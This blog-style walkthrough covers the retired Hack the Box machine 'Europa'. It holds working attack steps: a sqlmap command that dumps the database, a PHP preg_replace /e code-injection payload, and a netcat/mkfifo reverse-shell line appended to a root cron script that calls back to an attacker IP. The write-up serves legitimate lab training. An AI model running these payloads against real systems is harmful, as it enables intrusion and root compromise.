Europa: Retired 2 Dec 2017

If you are interested in learning more about penetration testing, Hack the Box is a great way to get your feet wet in a legal and well built environment. Head over to hackthebox.eu to get started

Enumeration

Using Sparta, I ran a staged NMAP scan against the target host: 10.10.10.22. This scan revealed three open ports: 22, 80, and 443.

All three ports appeared to be running standard services. The web pages both just showed the default Apache landing pages and running some directory brute forcing with WFUZZ did not reveal any obvious vectors for initial access.

 wfuzz -c --follow --hc 404 -z file,/usr/share/wordlists/wfuzz/general/medium.txt http://10.10.10.22/FUZZ

default-page

Investigating the SSL certificate further revealed the there is a domain name associated with this IP address/Cert of europacorp.htb. Updating /etc/hosts with this domain information and browsing to europacorp.htb still lands at the Apache landing page. Investigating the certificate even closer reveals what I had missed before, an alternative name for admin-portal.europacorp.htb.

image2017-11-30_19-55-30

Initial Access

Again updating /etc/hosts, accessing this page reveals a login screen. I also ran another round of directory brute forcing with the domain just to be sure with no luck. Immediately trying some standard SQL injection attacks did not work as the email field was doing input validation to ensure valid email addresses are being supplied. In order to find out if this validation was happening client side or server side, I decided to run the request through Burp. Trying some of the same attacks in Burp appeared to be successful as i was now getting SQL errors back from the server.

sql-error

Now that I knew I had a vulnerable parameter, I decided to run SQLMap to see what I could get out of the database. Which turned out to be a password hash for both the [email protected] and [email protected] users (same hash).

sqlmap -u https://admin-portal.europacorp.htb --data="email=something&password=something" -a

Grabbing the hashes from ~/.sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv I attempted to crack it using John and the rockyou wordlist but I did not have success. As with all tings, the next step was to Google. I used the website https://hashkiller.co.uk to see if I could crack the password. As a side note, this website funds themselves by running the CoinHive miner is the background. I know a lot of folks really disagree with this but I really didn't mind giving up a few minutes to CPU time to crack this hash, which is did in exactly 823 ms.

password

Using the cracked password SuperSecretPassword! I was able to login to the Admin Portal.

Host Access

Poking around the admin portal was fairly fruitless as most of the functionality was not implemented, however, there was one place where a user could supply input on the Tools page. Entering and IP address and generating the new config file basically does a string replace on the text. When viewed in Burp though, the code clearly implements a Regular Expression to do the match and replace. Initially I just tried some basic command injection but had no luck, it appeared that everything was being properly filtered/escaped.

Looking up the way that PHP implements regex replacements (Google search: php regular expression replace with command output) I found the page for the preg_replace replace command. Right at the top of the page there is a [link to 'modifiers']http://php.net/manual/en/reference.pcre.pattern.modifiers.php) for the pattern in the regex. About a third of the way down the page is a secion with a bunch of warnings and caution banners for the e modifier. A new Google search for "preg replace e modifier code injection" returned a top result with basically an exact walkthrough of what I needed to do.

e-modifier

Running the request through Burp I was easily able to modify the request as needed and was able to start executing commands by passing:

pattern=/replace_this/e
ipaddress=system('*<command>*')
test=replace_this

Using these requested in Burp I was able to slowly enumerate the system as the www-data user, eventually grabbing the user hash.

user-hash

Privilege Escalation

While looking in the webroot and the the parent directory, I noticed a crontab folder. The folder has some files in it the appear to clear out the web server's access logs. Suspecting that these files probably were called by a cron job, I took a peak in /etc/crontab and found what I was expecting, a cron job to run one of the files, set to run every minute.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *   root    /var/www/cronjobs/clearlogs

Invetigating the clearlogs file shows that it clears out the web server access logs and then executes another script that www-data has read and write access to but that root was executing from Crontab, /var/www/cmd/logcleared.sh (not sure of the actual permissions because someone else was also working with the both and I noticed the permissions change at one point).

Having low level code execution and a writeable file that executes as root gave me everything I needed to get a root level shell.

Using the reverse shell cheat sheet from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet I tried a few different shells without like but finally had success with the netCat workaround reverse shell for NetCat ipmlementations with the -e flag. I passed the needed code in the ipaddress parameter, URL-encoding the & as passing it un-encoded causes issues. I also tried to append to the file (>>) and run the line as a background task (final %26) so that anyone else using the machine would hopefully not be impacted. (Not really sure if this worked or not).

system('echo "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>%261|nc 10.10.15.14 443 >/tmp/g" %26 >> /var/www/cmd/logcleared.sh')

Waiting a minute I finally had a root shell back and had hacked this box.

root

What I Learned

  • Use the -a options with SQLMap to dump the database contents. Once I knew I had SQL injection I spent a lot of time in Burp trying to extract the data manually and/or bypass login. Using SQLMap with the -a option got me the user hashses fairly quickly.
  • Do not rely on one wordlist or source for cracking passwords. This was my first time using https://hashkiller.co.uk but it worked like a charm.
  • Be sure to understand how code is implemented (the string replacement) AND what language it is implemented in. I spent a lot of time trying to figure out how to do command injection with regex string replacement in Linux/bash before I finally realized that I need to be looking for how to do this in PHP.